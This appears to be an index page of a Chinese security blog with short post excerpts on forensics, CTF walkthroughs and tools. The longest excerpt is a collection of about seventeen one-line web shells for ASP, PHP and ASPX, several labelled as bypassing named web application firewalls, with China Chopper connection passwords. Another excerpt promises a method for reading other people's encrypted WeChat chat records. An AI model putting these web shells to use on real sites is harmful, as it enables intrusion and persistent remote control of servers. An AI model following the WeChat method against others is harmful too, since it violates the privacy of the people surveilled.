日志查看相关linux命令

sort

阅读更多

安卓手机地理位置信息取证

百度地图取证方法

第一步寻找:对百度地图所有文件进行location、longitude、latitude等关键词扫描,扫描出所含关键词的文件被标记为行踪轨迹文件。再通过正则表达式来检索重点标记文件,当文件有“20.123”类似经纬度数据,则该文件被标记为GPS数据文件。

阅读更多

如何破解微信加密数据库EnMicroMsg.db读取聊天消息

如何查看别人手机中的微信聊天记录呢?微信作为最常用的聊天软件,其聊天信息已经经过了加密,要想查看别人用微信进行聊天的记录,就需要按以下步骤来操作,以下是具体的操作方法。

阅读更多

Vulnhub - Mr. Robot CTF Video Walkthrough

Video地址

阅读更多

如何优雅地使用sublime

相关教程

如何优雅地使用sublime

阅读更多

伪基站鉴定相关要点

Openbts日志:  

/var/log/Openbts.log  
/var/log/syslog

阅读更多

kali计算机取证——安全牛

windows下内存镜像获取

dumpit工具 http://www.moonsols.com/wp-content/uploads/downloads/2011/07/DumpIt.zip
直接点击运行exe程序,得到7.raw文件

阅读更多

vps修改时区

阅读更多

一句话木马

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
1、asp一句话木马:
<%eval request(“x”)%>
2、php一句话木马:
<?php eval($_POST[g]);?>
3、aspx一句话:
<%@ Page Language=”Jscript”%><%eval(Request.Item["x"],”unsafe”);%>
4、数据库加密一句话(密码a):
┼攠数畣整爠焕敌瑳∨≡┩忾
5、网站配置、版权信息专用一句话:
”%><%Eval Request(x)%>
6、一句话再过护卫神:
<%Y=request(“x”)%> <%execute(Y)%>
7、过拦截一句话木马:
<% eXEcGlOBaL ReQuEsT(“x”) %>
8、asp闭合型一句话:
%><%eval request(“0o1Znz1ow”)%><%
9、能过安全狗的解析格式:
;hfdjf.;dfd.;dfdfdfd.asp;sdsd.jpg http://www.toreadsafe.xyz
10、突破安全狗的一句话:
<%Y=request(“x”)%> <%eval(Y)%>
11、elong过安全狗的php一句话:
<?php $a = “a”.”s”.”s”.”e”.”r”.”t”; $a($_POST[cc]); ?>
12、突破护卫神,保护盾一句话:
<?php $a = str_replace(x,”",”axsxxsxexrxxt”);
$a($_POST["test"]); ?>
13、高强度php一句话:
<?php substr(md5($_REQUEST['heroes']),28)==’acd0′&&eval($_REQUEST['c']);?>
14、后台常用写入php一句话(密码x):
<?
$fp = @fopen(“c.php”, ‘a’);
f@fwrite($fp, ‘<’.'?php’.”\r\n\r\n”.’eval($_POST[x])’.”\r\n\r\n?”.”>\r\n”);
@fclose($fp);
?>
15、许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传,这样一句话木马就写入不进数据库了。
‘ E& Y; Y1 R$ s# ]. L$ c改成:〈scriptlanguage=VBScript runat=server〉execute request(“l”)〈/Script
这样就避开了使用〈%%〉,保存为.ASP,程序照样执行的效果是一样的
16、PHP高强度一句话:
<?php substr(md5($_REQUEST['x']),28)==’acd0′&&eval($_REQUEST['c']);?> 菜刀连接:/x.php?x=lostwolf 脚本类型:php 密码:c
<?php assert($_REQUEST["c"]);?> 菜刀连接 躲避检测 密码:c
17、突破安全狗的aspx的一句话:
<%@ Page Language=”C#” ValidateRequest=”false” %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance(“c”, true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

阅读更多

lshack拿站实例

作者 : lahack
qq : 527480074
博客 : https://www.lshack.cn/

阅读更多